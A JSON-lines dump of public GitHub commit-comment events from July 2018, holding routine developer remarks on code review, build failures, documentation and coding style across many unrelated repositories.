{"id":"7949130100","type":"CommitCommentEvent","actor":{"login":"einarjh"},"repo":{"name":"browsh-org/browsh"},"payload":{"comment":{"id":29668849,"position":null,"line":null,"path":null,"commit_id":"24c49213e214cd89c3d846ece0745f210069f945","created_at":"2018-07-11T10:18:58Z","updated_at":"2018-07-11T10:18:58Z","author_association":"NONE","body":"Fair enough. It looks as though firefox-esr in stretch will be upgraded to ESR 60 some time during august/september. Is Firefox 60 new enough?\r\n\r\nRef: https://www.reddit.com/r/debian/comments/8lsgfe/when_will_firefox_esr_v60_be_available_in_debian_9/"}},"created_at":"2018-07-11T10:18:58Z"}
{"id":"7949131825","type":"CommitCommentEvent","actor":{"login":"souravsg"},"repo":{"name":"souravsg/Multi-Select-Checkbox"},"payload":{"comment":{"id":29668852,"position":null,"line":null,"path":null,"commit_id":"f13aa82835c74694a7b80971d2f49f9bb31a4a47","created_at":"2018-07-11T10:19:20Z","updated_at":"2018-07-11T10:19:20Z","author_association":"OWNER","body":"Check all and Uncheck all multiple checkbox"}},"created_at":"2018-07-11T10:19:20Z"}
{"id":"7949136105","type":"CommitCommentEvent","actor":{"login":"senthilkumarpari"},"repo":{"name":"senthilkumarpari/senthilkumarpari.github.io"},"payload":{"comment":{"id":29668863,"position":null,"line":null,"path":null,"commit_id":"bb109cb58a16ac3196a9e5175b25ea67a33494f2","created_at":"2018-07-11T10:20:02Z","updated_at":"2018-07-11T10:20:02Z","author_association":"OWNER","body":"new image added"}},"created_at":"2018-07-11T10:20:02Z"}
{"id":"7949139633","type":"CommitCommentEvent","actor":{"login":"zapladazol"},"repo":{"name":"zapladazol/ruby"},"payload":{"comment":{"id":29668867,"position":null,"line":null,"path":null,"commit_id":"79d49d1a7004a1e461e9b4f239eed1d201ed9d51","created_at":"2018-07-11T10:20:33Z","updated_at":"2018-07-11T10:20:33Z","author_association":"OWNER","body":"  ENV[\"RUBYOPT\"] = opt + \" -W1\""}},"created_at":"2018-07-11T10:20:33Z"}
{"id":"7949140118","type":"CommitCommentEvent","actor":{"login":"cyberliem"},"repo":{"name":"KyberNetwork/reserve-data"},"payload":{"comment":{"id":29668868,"position":null,"line":null,"path":null,"commit_id":"465ac9883def5886f60a3f097521d185fd127055","created_at":"2018-07-11T10:20:38Z","updated_at":"2018-07-11T10:20:38Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Integrate new core setting with dashboard](https://trello.com/c/9p1VW0ZQ/178-integrate-new-core-setting-with-dashboard)"}},"created_at":"2018-07-11T10:20:38Z"}
{"id":"7949141834","type":"CommitCommentEvent","actor":{"login":"zapladazol"},"repo":{"name":"zapladazol/ruby"},"payload":{"comment":{"id":29668874,"position":5,"line":21,"path":"basictest/runner.rb","commit_id":"79d49d1a7004a1e461e9b4f239eed1d201ed9d51","created_at":"2018-07-11T10:20:55Z","updated_at":"2018-07-11T10:20:55Z","author_association":"OWNER","body":"  ENV[\"RUBYOPT\"] = opt + \" -W1\""}},"created_at":"2018-07-11T10:20:55Z"}
{"id":"7949143343","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29668880,"position":102,"line":92,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T10:21:10Z","updated_at":"2018-07-11T10:21:10Z","author_association":"NONE","body":"I meant declare _and_ assign the balance. Because on line 87 you do `remittances[remittanceHash].balance != 0`, which means you do an expensive `SLOAD`. On line 92 you do another `SLOAD` for the same value. So why not `SLOAD` it once before both uses?"}},"created_at":"2018-07-11T10:21:10Z"}
{"id":"7949155877","type":"CommitCommentEvent","actor":{"login":"senthilkumarpari"},"repo":{"name":"senthilkumarpari/senthilkumarpari.github.io"},"payload":{"comment":{"id":29668904,"position":null,"line":null,"path":null,"commit_id":"fa73b5df43e13f47bcf0acbc010335f17cdfd14d","created_at":"2018-07-11T10:23:35Z","updated_at":"2018-07-11T10:23:35Z","author_association":"OWNER","body":"image_updated"}},"created_at":"2018-07-11T10:23:35Z"}
{"id":"7949157745","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29668911,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-11T10:23:57Z","updated_at":"2018-07-11T10:23:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T10:23:57Z"}
{"id":"7949158169","type":"CommitCommentEvent","actor":{"login":"Ghostbird"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29668912,"position":null,"line":null,"path":null,"commit_id":"a8ccbd40a421a86c5a5d753c841d82d71c7df46e","created_at":"2018-07-11T10:24:02Z","updated_at":"2018-07-11T10:24:02Z","author_association":"NONE","body":"This broke the functionality of ESP32-Arduino on my linux box. Arduino IDE can't find `esptool.py` at …`/tools/esptool/esptool.py` because it is in fact located at …`/tools/esptool.py`"}},"created_at":"2018-07-11T10:24:02Z"}
{"id":"7949161791","type":"CommitCommentEvent","actor":{"login":"GaryJones"},"repo":{"name":"WordPress-Coding-Standards/WordPress-Coding-Standards"},"payload":{"comment":{"id":29668919,"position":null,"line":null,"path":null,"commit_id":"9c6bf448a35ffd85ef90b30d1e76884567b780a6","created_at":"2018-07-11T10:24:48Z","updated_at":"2018-07-11T10:24:48Z","author_association":"MEMBER","body":"Noting here, that while WPCS currently has nothing in the handbook regarding the ordering of `use` statements, [PSR-12](https://github.com/php-fig/fig-standards/blob/master/proposed/extended-coding-style-guide.md#3-declare-statements-namespace-and-import-statements) does say that it should be class-based `use` statements, then function-based, then constant base, with a clear line between each one."}},"created_at":"2018-07-11T10:24:48Z"}
{"id":"7949181980","type":"CommitCommentEvent","actor":{"login":"avasilyev-github"},"repo":{"name":"avasilyev-github/StartupIdeas"},"payload":{"comment":{"id":29668993,"position":null,"line":null,"path":null,"commit_id":"cc0119bdcb0cadf5f85600eccdbd23f16e543a3e","created_at":"2018-07-11T10:28:58Z","updated_at":"2018-07-11T10:28:58Z","author_association":"OWNER","body":"Добавил идею стартапа EarthquakeDog"}},"created_at":"2018-07-11T10:28:58Z"}
{"id":"7949188515","type":"CommitCommentEvent","actor":{"login":"smartinick"},"repo":{"name":"smartinick/esp32_xiaomi_m365"},"payload":{"comment":{"id":29669009,"position":null,"line":null,"path":null,"commit_id":"400f0b3029b230807638aaf2ff68f9b1c5c0f9a8","created_at":"2018-07-11T10:30:21Z","updated_at":"2018-07-11T10:30:21Z","author_association":"OWNER","body":"#1 fixed"}},"created_at":"2018-07-11T10:30:21Z"}
{"id":"7949193982","type":"CommitCommentEvent","actor":{"login":"psymonn"},"repo":{"name":"psymonn/myPowerShell"},"payload":{"comment":{"id":29669020,"position":5,"line":58,"path":"Get-DiskSpaceInfo5.ps1","commit_id":"87a600a18e36bed9bf1f44c823a3a2641e03ec15","created_at":"2018-07-11T10:31:26Z","updated_at":"2018-07-11T10:31:26Z","author_association":"OWNER","body":"Yay!..it is more generic now."}},"created_at":"2018-07-11T10:31:26Z"}
{"id":"7949198196","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29669035,"position":null,"line":null,"path":null,"commit_id":"23e6be9c242a4eda6fa75055360cc170dd221ff3","created_at":"2018-07-11T10:32:18Z","updated_at":"2018-07-11T10:32:18Z","author_association":"NONE","body":"This structure looks better (object oriented) than the previous one :-) Nice work.\r\nJust one remark about CCalibFromPlanesWrapper, the name indication -name-GUI is much more specific than -name-Wrapper ;-)"}},"created_at":"2018-07-11T10:32:18Z"}
{"id":"7949202052","type":"CommitCommentEvent","actor":{"login":"abhikirdat"},"repo":{"name":"abhikirdat/DEMO"},"payload":{"comment":{"id":29669039,"position":null,"line":null,"path":null,"commit_id":"896046c229516a472d5bcd57ac20d3af785d3ab3","created_at":"2018-07-11T10:33:03Z","updated_at":"2018-07-11T10:33:03Z","author_association":"OWNER","body":"abhi com"}},"created_at":"2018-07-11T10:33:03Z"}
{"id":"7949202869","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29669040,"position":51,"line":50,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T10:33:13Z","updated_at":"2018-07-11T10:33:13Z","author_association":"OWNER","body":":-)"}},"created_at":"2018-07-11T10:33:13Z"}
{"id":"7949205796","type":"CommitCommentEvent","actor":{"login":"Guitarheroua"},"repo":{"name":"Guitarheroua/libsass-for-qt"},"payload":{"comment":{"id":29669047,"position":null,"line":null,"path":null,"commit_id":"c6882ccd5600d3749b7ab5355386ba60e592186b","created_at":"2018-07-11T10:33:48Z","updated_at":"2018-07-11T10:33:48Z","author_association":"OWNER","body":"@saper This was raw fix, and it only makes possible to use libsass for qss files(because in qss it is possible to write for example \"selector:!pseudo-class\"). I tested it only with sass that converts to qss, and do not checks this fix with regular css. I think, if do this in a correct way, better to add some parameter or define to build lib with this feature, as it may lead CSS people in a incorrect syntax, without complaining :)  But for QSS it works :)"}},"created_at":"2018-07-11T10:33:48Z"}
{"id":"7949209087","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29669060,"position":null,"line":null,"path":null,"commit_id":"cba65526a60debfd9ad1c1a34b55c022b6bca37a","created_at":"2018-07-11T10:34:30Z","updated_at":"2018-07-11T10:34:30Z","author_association":"CONTRIBUTOR","body":"Noo, the user won't know that they has to disallow flight later."}},"created_at":"2018-07-11T10:34:30Z"}
{"id":"7949211114","type":"CommitCommentEvent","actor":{"login":"karmeli87"},"repo":{"name":"ravendb/ravendb"},"payload":{"comment":{"id":29669064,"position":80,"line":1085,"path":"src/Raven.Server/Documents/Replication/IncomingReplicationHandler.cs","commit_id":"0d112dc995b59181b07a7046365462d3a1bbe1e0","created_at":"2018-07-11T10:34:52Z","updated_at":"2018-07-11T10:34:52Z","author_association":"CONTRIBUTOR","body":"Need to move this inside the `AssertAttachmentsFromReplication`, otherwise it will notify for every time."}},"created_at":"2018-07-11T10:34:52Z"}
{"id":"7949213094","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29669069,"position":26,"line":43,"path":"test/remittance.js","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T10:35:17Z","updated_at":"2018-07-11T10:35:17Z","author_association":"OWNER","body":"Changed it!"}},"created_at":"2018-07-11T10:35:17Z"}
{"id":"7949218498","type":"CommitCommentEvent","actor":{"login":"yossigo"},"repo":{"name":"willemt/raft"},"payload":{"comment":{"id":29669078,"position":null,"line":null,"path":null,"commit_id":"84ac58a486487d173e1d5cbd7efe421d041e59c2","created_at":"2018-07-11T10:36:27Z","updated_at":"2018-07-11T10:36:27Z","author_association":"CONTRIBUTOR","body":"Hi @willemt, unless there's something I miss this commit makes it impossible to set up udata for nodes that get created as a result of AppendEntries.  The flow is this:\r\n\r\n`raft_append_entry()` => `log_append_entry()` => `cb->log_offer()`\r\n\r\nThe `cb->log_offer()` is the first and last chance to look at the entry data and set up a udata, however at this time the node does not exist so the callback must call `raft_add_node()` which will create the node.  This leads to two problems:\r\n1) The callback needs to deal with Raft logic that ideally be avoided (was always the case).\r\n2) Once the callback returns, `raft_offer_log()` will be called, will reach the same decision of adding the node (with udata=NULL) and hit the assertion because the node exists.\r\n\r\nNow that there are membership event callbacks, it may be a good idea to pass the log entry that created the node so the membership function can extract node info, generate its own udata and set it up.  This way the `log_offer()` callback no longer needs to handle node memberships.\r\n\r\nWDUT?"}},"created_at":"2018-07-11T10:36:27Z"}
{"id":"7949221487","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29669082,"position":130,"line":114,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T10:37:05Z","updated_at":"2018-07-11T10:37:05Z","author_association":"OWNER","body":"\"If Alice sends money to 2 different contracts with the same combination, sendMoney will not throw any error because each contract is unaware of the other.\"  Do you mean AT THE EXACT same moment ?"}},"created_at":"2018-07-11T10:37:05Z"}
{"id":"7949226556","type":"CommitCommentEvent","actor":{"login":"qwertbob"},"repo":{"name":"qwertbob/P64xDataModel"},"payload":{"comment":{"id":29669088,"position":null,"line":null,"path":null,"commit_id":"0cdef5773f7d8856f5b2f3a82ba717dafa587636","created_at":"2018-07-11T10:38:10Z","updated_at":"2018-07-11T10:38:10Z","author_association":"OWNER","body":"P642 DDB L&F"}},"created_at":"2018-07-11T10:38:10Z"}
{"id":"7949231065","type":"CommitCommentEvent","actor":{"login":"PatrickvL"},"repo":{"name":"xqemu/xqemu"},"payload":{"comment":{"id":29669103,"position":47,"line":null,"path":"hw/xbox/nv2a/nv2a_psh.c","commit_id":"603b6f15f28753bddff941603868733d3138d263","created_at":"2018-07-11T10:39:09Z","updated_at":"2018-07-11T10:39:09Z","author_association":"NONE","body":"These were aligned for readability"}},"created_at":"2018-07-11T10:39:09Z"}
{"id":"7949232828","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29669107,"position":null,"line":null,"path":null,"commit_id":"316e8acf4aa2368ae9d9a464ca0e540f13a440b2","created_at":"2018-07-11T10:39:29Z","updated_at":"2018-07-11T10:39:29Z","author_association":"NONE","body":"Hi @karnikram \r\nRemember what I told you, when you write or modify classes, functions and even members, you must add the description with doxygen comments. This also will help you to organize better the project. In this commit you only added the description for two members in CObervationTreeModel, but you left many others without. "}},"created_at":"2018-07-11T10:39:29Z"}
{"id":"7949236974","type":"CommitCommentEvent","actor":{"login":"zweny"},"repo":{"name":"zweny/hello-world"},"payload":{"comment":{"id":29669112,"position":null,"line":null,"path":null,"commit_id":"afab12ea14b1eda14cac50b3bcbdfedfb9911374","created_at":"2018-07-11T10:40:21Z","updated_at":"2018-07-11T10:40:21Z","author_association":"OWNER","body":"12312221"}},"created_at":"2018-07-11T10:40:21Z"}
{"id":"7949239862","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29669116,"position":18,"line":49,"path":"gui/observation_tree/CObservationTreeModel.h","commit_id":"316e8acf4aa2368ae9d9a464ca0e540f13a440b2","created_at":"2018-07-11T10:40:50Z","updated_at":"2018-07-11T10:40:50Z","author_association":"NONE","body":"After adding this comment line, I think it was a good moment to write similar comments for all the members in this class."}},"created_at":"2018-07-11T10:40:50Z"}
{"id":"7949243976","type":"CommitCommentEvent","actor":{"login":"lukeeey"},"repo":{"name":"Fr0stweaver/GoMint"},"payload":{"comment":{"id":29669121,"position":null,"line":null,"path":null,"commit_id":"8f4a4e5d6f7977f2d80a657dfcebb545fe7a76e3","created_at":"2018-07-11T10:41:25Z","updated_at":"2018-07-11T10:41:25Z","author_association":"NONE","body":"Couldn't you just return false on isOnFire "}},"created_at":"2018-07-11T10:41:25Z"}
{"id":"7949246269","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29669123,"position":10,"line":32,"path":"gui/CMainWindow.h","commit_id":"316e8acf4aa2368ae9d9a464ca0e540f13a440b2","created_at":"2018-07-11T10:41:53Z","updated_at":"2018-07-11T10:41:53Z","author_association":"NONE","body":"I'm also missing here the comments for this class that you have just modified"}},"created_at":"2018-07-11T10:41:53Z"}
{"id":"7949252473","type":"CommitCommentEvent","actor":{"login":"pfpjs"},"repo":{"name":"chapmanb/cloudbiolinux"},"payload":{"comment":{"id":29669133,"position":18,"line":25,"path":"ggd-recipes/hg19/mirbase.yaml","commit_id":"1c69667805dabd4c9f4cb91bb55b0a347b953739","created_at":"2018-07-11T10:43:16Z","updated_at":"2018-07-11T10:43:16Z","author_association":"NONE","body":"Hi, shouldn't this line be commented? Otherwise I get this when upgrading bcbio:\r\n`/path/to/bcbio/genomes/Hsapiens/hg19/txtmp/ggd-run.sh: line 18: mirbase: command not found`"}},"created_at":"2018-07-11T10:43:16Z"}
{"id":"7949253674","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/meikaijava"},"payload":{"comment":{"id":29669134,"position":20,"line":20,"path":"e_16/src/e_16_1/e_16_1.java","commit_id":"9714d042e43eb3275eb95f29a195b4aebd9f9080","created_at":"2018-07-11T10:43:32Z","updated_at":"2018-07-11T10:43:32Z","author_association":"COLLABORATOR","body":"柴田\r\nメソッド名が実行する処理を表していないように見えます。\r\n何をしているメソッドかを考えて名前を付けてください。他メソッドも同様\r\n（今回は教本が読めていなかったこともありましたが）"}},"created_at":"2018-07-11T10:43:32Z"}
{"id":"7949260235","type":"CommitCommentEvent","actor":{"login":"densh"},"repo":{"name":"scala/scala"},"payload":{"comment":{"id":29669146,"position":22,"line":22,"path":"src/compiler/scala/tools/reflect/quasiquotes/Placeholders.scala","commit_id":"7184fe0d3740ac8558067c18bdf449a65a8a26b9","created_at":"2018-07-11T10:44:58Z","updated_at":"2018-07-11T10:44:58Z","author_association":"CONTRIBUTOR","body":"Any sufficiently unique name generator should work for this. The one used in Scalameta would work just as well if used here."}},"created_at":"2018-07-11T10:44:58Z"}
{"id":"7949260874","type":"CommitCommentEvent","actor":{"login":"jrfnl"},"repo":{"name":"WordPress-Coding-Standards/WordPress-Coding-Standards"},"payload":{"comment":{"id":29669149,"position":null,"line":null,"path":null,"commit_id":"9c6bf448a35ffd85ef90b30d1e76884567b780a6","created_at":"2018-07-11T10:45:06Z","updated_at":"2018-07-11T10:45:06Z","author_association":"CONTRIBUTOR","body":"As discussed in Slack: I've already got you covered there with a sniff which I'll be pulling to PHPCS itself ;-)"}},"created_at":"2018-07-11T10:45:06Z"}
{"id":"7949271068","type":"CommitCommentEvent","actor":{"login":"Rose8801"},"repo":{"name":"Rose8801/Rose88-ivy"},"payload":{"comment":{"id":29669168,"position":null,"line":null,"path":null,"commit_id":"360259eb44337f6941ea33858fd8a7e60e03bf2e","created_at":"2018-07-11T10:47:17Z","updated_at":"2018-07-11T10:47:17Z","author_association":"OWNER","body":"     if (command === \"iv\") {\r\n+        // Specific code of my own.\r\n+        if (args[0] == '<@240235446020472833>' | args[0] == 'rose' | args[0] == 'rose88' | args[0] == 'rose888') {\r\n+            message.channel.send('Top secret :joy:!!!');\r\n+            return;\r\n+        }\r\n+        // Specific code of my own - END"}},"created_at":"2018-07-11T10:47:17Z"}
{"id":"7949273638","type":"CommitCommentEvent","actor":{"login":"malle-pietje"},"repo":{"name":"Art-of-WiFi/UniFi-API-client"},"payload":{"comment":{"id":29669175,"position":null,"line":null,"path":null,"commit_id":"4dddd08d8bf6d6fcd0e3ed73ef8e1a4aab666ef1","created_at":"2018-07-11T10:47:50Z","updated_at":"2018-07-11T10:47:50Z","author_association":"COLLABORATOR","body":"Can you please open an issue with this info? That's where other will look for solutions, not in the comments for a non-related commit. I'll respond there."}},"created_at":"2018-07-11T10:47:50Z"}
{"id":"7949273826","type":"CommitCommentEvent","actor":{"login":"ID2GO"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29669176,"position":14,"line":118,"path":"app/src/main/java/com/example/android/pets/data/PetContract.java","commit_id":"6861be56c0c5c3673f0a0b8a04922bfee823582b","created_at":"2018-07-11T10:47:52Z","updated_at":"2018-07-11T10:47:52Z","author_association":"NONE","body":"Indeed, just adding extra code that will not be of use on the gender method due to the spinner.\r\nIt might have been of use for the breed method. But then all of a sudden all input is fine, even null."}},"created_at":"2018-07-11T10:47:52Z"}
{"id":"7949308239","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":29669245,"position":null,"line":null,"path":null,"commit_id":"a87c6d31897bd2187eea323e3289fb35c3e0f918","created_at":"2018-07-11T10:55:12Z","updated_at":"2018-07-11T10:55:12Z","author_association":"CONTRIBUTOR","body":"all tests pass:\nsuccess: https://travis-ci.org/stellar/stellar-core/builds/402597266?utm_source=github_status&utm_medium=notification\n"}},"created_at":"2018-07-11T10:55:12Z"}
{"id":"7949310864","type":"CommitCommentEvent","actor":{"login":"NiklasRosenstein"},"repo":{"name":"vibora-io/vibora"},"payload":{"comment":{"id":29669250,"position":40,"line":193,"path":"vibora/utils.py","commit_id":"7d10ab61cb91e39b71fcf13b23cf57d8c1680f72","created_at":"2018-07-11T10:55:46Z","updated_at":"2018-07-11T10:55:46Z","author_association":"NONE","body":"A \"few\" more CPU cycles? `time.sleep()` takes seconds and not milliseconds as its argument."}},"created_at":"2018-07-11T10:55:46Z"}
{"id":"7949317744","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-jissyusei1/meikai_java_2017_02_shida"},"payload":{"comment":{"id":29669264,"position":null,"line":null,"path":null,"commit_id":"57cd0dfddb12d7f32ac6170ded14dfb3952e6f4b","created_at":"2018-07-11T10:57:16Z","updated_at":"2018-07-11T10:57:16Z","author_association":"COLLABORATOR","body":"柴田\r\nargsの意味を確認しておいてください。\r\nその上で今後使用すべきか否かを検討してください。\r\n今回は問題なしとします。"}},"created_at":"2018-07-11T10:57:16Z"}
{"id":"7949320937","type":"CommitCommentEvent","actor":{"login":"tee3"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29669267,"position":96,"line":85,"path":"doc/installation.md","commit_id":"bea031f8b2e96ad3e8279f36b384a60693f53e4b","created_at":"2018-07-11T10:57:57Z","updated_at":"2018-07-11T10:57:57Z","author_association":"NONE","body":"Should this be `(projectile-mode +1)` as in the non-pinned `use-package` above?  Isn't `projectile-global-mode` remove and / or deprecated now?"}},"created_at":"2018-07-11T10:57:57Z"}
{"id":"7949322471","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29669275,"position":null,"line":null,"path":null,"commit_id":"d33bac539c5b126ec86c5ac89892520119725d50","created_at":"2018-07-11T10:58:17Z","updated_at":"2018-07-11T10:58:17Z","author_association":"MEMBER","body":"@lackac yes, the goal is only to keep `@deprecated` on where it has a runtime effect, which for now is exclusive to functions/macros."}},"created_at":"2018-07-11T10:58:17Z"}
{"id":"7949322733","type":"CommitCommentEvent","actor":{"login":"artyomevgrafov"},"repo":{"name":"artyomevgrafov/python_training"},"payload":{"comment":{"id":29669278,"position":1,"line":1,"path":"README.md","commit_id":"4b1287d19694add79397e1a7112b7a7e24027c68","created_at":"2018-07-11T10:58:20Z","updated_at":"2018-07-11T10:58:20Z","author_association":"OWNER","body":"# Repository for tranning"}},"created_at":"2018-07-11T10:58:20Z"}
{"id":"7949326783","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.discussion"},"payload":{"comment":{"id":29669291,"position":null,"line":null,"path":null,"commit_id":"e9e9e7b84a26181a23e1214a3dfdd9a969cd2acb","created_at":"2018-07-11T10:59:15Z","updated_at":"2018-07-11T10:59:15Z","author_association":"NONE","body":"@hvelarde Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.app.discussion/78/violations\n```\nplone/app/discussion/catalog.py:17:1: I003 isort expected 1 blank line in imports, found 0\nplone/app/discussion/browser/comment.py:17:1: F811 redefinition of unused 'CommentForm' from line 2\nplone/app/discussion/browser/comment.py:17:1: I001 isort found an import in the wrong position\nplone/app/discussion/tests/test_indexers.py:5:1: I001 isort found an import in the wrong position\nplone/app/discussion/tests/test_comment.py:177:31: C812 missing trailing comma\nplone/app/discussion/tests/test_functional.py:34:18: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-11T10:59:15Z"}
{"id":"7949331255","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":29669301,"position":null,"line":null,"path":null,"commit_id":"a87c6d31897bd2187eea323e3289fb35c3e0f918","created_at":"2018-07-11T11:00:14Z","updated_at":"2018-07-11T11:00:14Z","author_association":"CONTRIBUTOR","body":"fast-forwarding master to auto = ce5e5d10"}},"created_at":"2018-07-11T11:00:14Z"}
{"id":"7949334766","type":"CommitCommentEvent","actor":{"login":"spaulaus"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":29669311,"position":3,"line":3,"path":"Analysis/Utkscan/processors/include/PspmtProcessor.hpp","commit_id":"996abfdb5bec8ef7f87cb4b281bc144ebdd9edc4","created_at":"2018-07-11T11:00:55Z","updated_at":"2018-07-11T11:00:55Z","author_association":"MEMBER","body":"You shouldn't remove author attribution. Shintaro and I had a big hand in the first iterations of this processor. "}},"created_at":"2018-07-11T11:00:55Z"}
{"id":"7949335460","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29669315,"position":null,"line":null,"path":null,"commit_id":"316e8acf4aa2368ae9d9a464ca0e540f13a440b2","created_at":"2018-07-11T11:01:04Z","updated_at":"2018-07-11T11:01:04Z","author_association":"OWNER","body":"Sorry for not being diligent about adding doxygen comments.\r\nFrom now on I'll comment as many members as possible in every file I modify."}},"created_at":"2018-07-11T11:01:04Z"}
{"id":"7949336642","type":"CommitCommentEvent","actor":{"login":"spaulaus"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":29669316,"position":3,"line":3,"path":"Analysis/Utkscan/processors/source/PspmtProcessor.cpp","commit_id":"996abfdb5bec8ef7f87cb4b281bc144ebdd9edc4","created_at":"2018-07-11T11:01:18Z","updated_at":"2018-07-11T11:01:18Z","author_association":"MEMBER","body":"Same here, authors should only be added, not removed. "}},"created_at":"2018-07-11T11:01:18Z"}
{"id":"7949340354","type":"CommitCommentEvent","actor":{"login":"iiUMeex"},"repo":{"name":"iiUMeex/iiUMeex-Bot"},"payload":{"comment":{"id":29669325,"position":2,"line":2,"path":"README.md","commit_id":"971d3724cede0c70dba4672e8a266d4427051ee9","created_at":"2018-07-11T11:02:08Z","updated_at":"2018-07-11T11:02:08Z","author_association":"OWNER","body":"Command\r\n*help For Help Command\r\n*ban To Ban A Member\r\n*invite For Invite Bot To Your Server\r\n*invites For Invites Manage\r\nmore is coming!!.."}},"created_at":"2018-07-11T11:02:08Z"}
{"id":"7949343072","type":"CommitCommentEvent","actor":{"login":"111zyf111"},"repo":{"name":"HongkongTang/JAVAWEB_Shopping_JSP_Servlet"},"payload":{"comment":{"id":29669331,"position":null,"line":null,"path":null,"commit_id":"83970248a4b507fd2721971547e410467db2c311","created_at":"2018-07-11T11:02:43Z","updated_at":"2018-07-11T11:02:43Z","author_association":"NONE","body":"你好，能不能把您做的这个小型购物系统的数据库给我发一份呢，我最近在研究这个，万分感谢，1713623983@qq.com"}},"created_at":"2018-07-11T11:02:43Z"}
{"id":"7949346267","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29669334,"position":null,"line":null,"path":null,"commit_id":"3ff7d7f0286af27e04bff8df3bde9726b1d91e66","created_at":"2018-07-11T11:03:26Z","updated_at":"2018-07-11T11:03:26Z","author_association":"COLLABORATOR","body":"Also see [Issue 683](https://github.com/weidai11/cryptopp/issues/683)."}},"created_at":"2018-07-11T11:03:26Z"}
{"id":"7949346822","type":"CommitCommentEvent","actor":{"login":"ape8089"},"repo":{"name":"lord/slate"},"payload":{"comment":{"id":29669335,"position":null,"line":null,"path":null,"commit_id":"4698045e79b963d495255b0e7ac9aa1f7e842f75","created_at":"2018-07-11T11:03:33Z","updated_at":"2018-07-11T11:03:33Z","author_association":"NONE","body":"4698045e79b963d495255b0e7ac9aa1f7e842f75"}},"created_at":"2018-07-11T11:03:33Z"}
{"id":"7949348705","type":"CommitCommentEvent","actor":{"login":"tking53"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":29669340,"position":null,"line":null,"path":null,"commit_id":"996abfdb5bec8ef7f87cb4b281bc144ebdd9edc4","created_at":"2018-07-11T11:03:59Z","updated_at":"2018-07-11T11:03:59Z","author_association":"COLLABORATOR","body":"Sure, I will add it back in the morning"}},"created_at":"2018-07-11T11:03:59Z"}
